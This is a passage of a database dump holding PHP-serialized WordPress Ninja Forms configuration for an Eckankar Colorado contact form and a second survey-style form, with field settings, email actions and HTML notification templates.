apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663800425943\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"627\";}i:8;a:2:{s:8:\"settings\";a:21:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:10:\"submit_278\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:10:\"submit_278\";s:15:\"container_class\";s:0:\"\";}s:2:\"id\";i:457;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-05-21 19:29:40\";s:5:\"label\";s:9:\"Save Form\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:195;}i:1;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"0\";s:10:\"created_at\";s:19:\"2021-05-21 19:29:40\";s:5:\"label\";s:17:\"Send copy to user\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:17:\"{field:email_270}\";s:13:\"email_subject\";s:41:\"Eckankar Colorado Springs - Communication\";s:13:\"email_message\";s:865:\"<p></p><p> </p><h2 style=\"color:#23507d;\"><span style=\"font-weight: normal;\"><b>ECKANKAR IN COLORADO SPRINGS</b> </span></h2><h4>You have created a new form submission on the Eckankar In Colorado website. We will be getting in touch soon!<br></h4><p>Here is a copy of the information you have submitted:</p>  <hr>    <p> First Name:&nbsp; {field:textbox_268}</p><p>Last Name:&nbsp; {field:lastname_269}</p><p>Email:&nbsp; {field:email_270}</p><p>Phone:&nbsp; {field:phone_1599585699152}</p><p>Message Subject:&nbsp; {field:textbox_303}</p><p>Message:&nbsp; {field:please_enter_your_message_here_1599585729237}<br></p>  <hr>    <p>If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Utah webmaster: webmaster@eckankar-utah.org</p><p class=\"\"><em>The Eckankar in Utah Team</em><br>https://www.eckankar-utah.org</p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:196;}i:2;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-05-21 19:29:40\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:360:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:197;}i:3;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-05-21 19:29:40\";s:5:\"label\";s:11:\"Admin Email\";s:19:\"email_message_plain\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:33:\"Eckankar In Colorado Contact Form\";s:12:\"from_address\";s:29:\"contact@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:39:\"Loveland Contact - Form Record Received\";s:13:\"email_message\";s:1855:\"<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><h1 style=\"color: #23507d;\"><u>ECKANKAR IN LOVELAND</u><br></h1><h3>ADMIN NOTIFICATION:<br></h3><h3><span style=\"font-weight: normal;\">You Have A New Web Contact Form Submission. <br>This form was generated by a user on the Eckankar In Colorado website.</span></h3><h3><span style=\"font-weight: normal;\">Here is a copy of the information submitted by </span>{field:textbox_268}</h3></div></div></div></div><div class=\"row bg-editor-hr-wrap\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><hr></div></div><div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\" style=\"background-color: #eeeeee;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p>&nbsp;</p><p class=\"\" style=\"font-size: 17px;\"><b>First Name:</b>&nbsp; {field:textbox_268}</p><p class=\"\" style=\"font-size: 17px;\"><b>Last Name:</b>&nbsp; {field:lastname_269}</p><p class=\"\" style=\"font-size: 17px;\"><b>Email:&nbsp;</b> {field:email_270}</p><p class=\"\" style=\"font-size: 17px;\"><b>Phone:</b>&nbsp; {field:phone_1599585699152}</p><p class=\"\" style=\"font-size: 17px;\"><b>Message Subject:</b>&nbsp; {field:textbox_303}</p><p class=\"\" style=\"font-size: 17px;\"><b>Message:&nbsp;</b> {field:please_enter_your_message_here_1599585729237}</p><p>&nbsp;</p></div></div></div></div><div class=\"row bg-editor-hr-wrap\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><hr></div></div><div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br>The Eckankar in Colorado Team<br>https://www.eckankar-colorado.org</p><p>&nbsp;</p><p>&nbsp;</p></div></div></div></div>\";s:14:\"drawerDisabled\";s:0:\"\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";}s:2:\"id\";i:198;}}s:8:\"settings\";a:40:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:28:\"Loveland Area - Contact Form\";s:10:\"created_at\";s:19:\"2021-05-21 19:29:40\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2016-03-03 03:15:50\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:8:\"last_sub\";s:2:\"36\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:9:{i:0;s:11:\"textbox_268\";i:1;s:12:\"lastname_269\";i:2;s:19:\"phone_1599585699152\";i:3;s:9:\"email_270\";i:4;s:11:\"textbox_303\";i:5;s:44:\"please_enter_your_message_here_1599585729237\";i:6;s:8:\"html_305\";i:7;s:18:\"html_1663800425943\";i:8;s:10:\"submit_278\";}s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:20:\"repeatable_fieldsets\";s:0:\"\";s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(50,'a:4:{s:2:\"id\";i:50;s:6:\"fields\";a:12:{i:0;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:1:\"1\";s:4:\"type\";s:9:\"firstname\";s:5:\"label\";s:10:\"First Name\";s:3:\"key\";s:23:\"firstname_1523910710496\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:0:\"\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:21:\"custom_name_attribute\";s:5:\"fname\";s:9:\"parent_id\";s:2:\"50\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:23:\"firstname_1523910710496\";}s:2:\"id\";i:459;}i:1;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:1:\"2\";s:4:\"type\";s:8:\"lastname\";s:5:\"label\";s:9:\"Last Name\";s:3:\"key\";s:22:\"lastname_1523910710972\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:0:\"\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:15:\"one-half second\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:14:\"drawerDisabled\";s:0:\"\";s:9:\"parent_id\";s:2:\"50\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:22:\"lastname_1523910710972\";}s:2:\"id\";i:460;}i:2;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:1:\"3\";s:5:\"label\";s:5:\"Email\";s:4:\"type\";s:5:\"email\";s:3:\"key\";s:19:\"email_1523910925640\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:0:\"\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:21:\"custom_name_attribute\";s:5:\"email\";s:9:\"parent_id\";s:2:\"50\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:19:\"email_1523910925640\";}s:2:\"id\";i:461;}i:3;a:2:{s:8:\"settings\";a:24:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:1:\"4\";s:4:\"type\";s:7:\"confirm\";s:5:\"label\";s:18:\"Email Confirmation\";s:3:\"key\";s:32:\"email_confirmation_1523911122242\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:0:\"\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:13:\"confirm_field\";s:19:\"email_1523910925640\";s:14:\"drawerDisabled\";s:0:\"\";s:9:\"parent_id\";s:2:\"50\";s:11:\"field_label\";s:18:\"Email Confirmation\";s:9:\"field_key\";s:32:\"email_confirmation_1523911122242\";}s:2:\"id\";i:462;}i:4;a:2:{s:8:\"settings\";a:26:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:1:\"5\";s:5:\"label\";s:21:\"Gender Identification\";s:4:\"type\";s:7:\"textbox\";s:3:\"key\";s:35:\"gender_identification_1523910801816\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:0:\"\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:9:\"parent_id\";s:2:\"50\";s:11:\"field_label\";s:21:\"Gender Identification\";s:9:\"field_key\";s:35:\"gender_identification_1523910801816\";}s:2:\"id\";i:463;}i:5;a:2:{s:8:\"settings\";a:18:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:1:\"6\";s:4:\"type\";s:9:\"listradio\";s:5:\"label\";s:3:\"Age\";s:3:\"key\";s:17:\"age_1523910843594\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:0:\"\";s:7:\"options\";a:3:{i:0;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"18-30\";s:5:\"value\";s:5:\"18-30\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:1;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"31-49\";s:5:\"value\";s:5:\"31-49\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:2;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"49+\";s:5:\"value\";s:2:\"49\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}}s:15:\"container_class\";s:14:\"three-col-list\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:9:\"parent_id\";s:2:\"50\";s:11:\"field_label\";s:3:\"Age\";s:9:\"field_key\";s:17:\"age_1523910843594\";}s:2:\"id\";i:464;}i:6;a:2:{s:8:\"settings\";a:18:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:1:\"7\";s:5:\"label\";s:10:\"Question 1\";s:4:\"type\";s:10:\"listselect\";s:3:\"key\";s:24:\"question_1_1523910940120\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:0:\"\";s:7:\"options\";a:3:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons 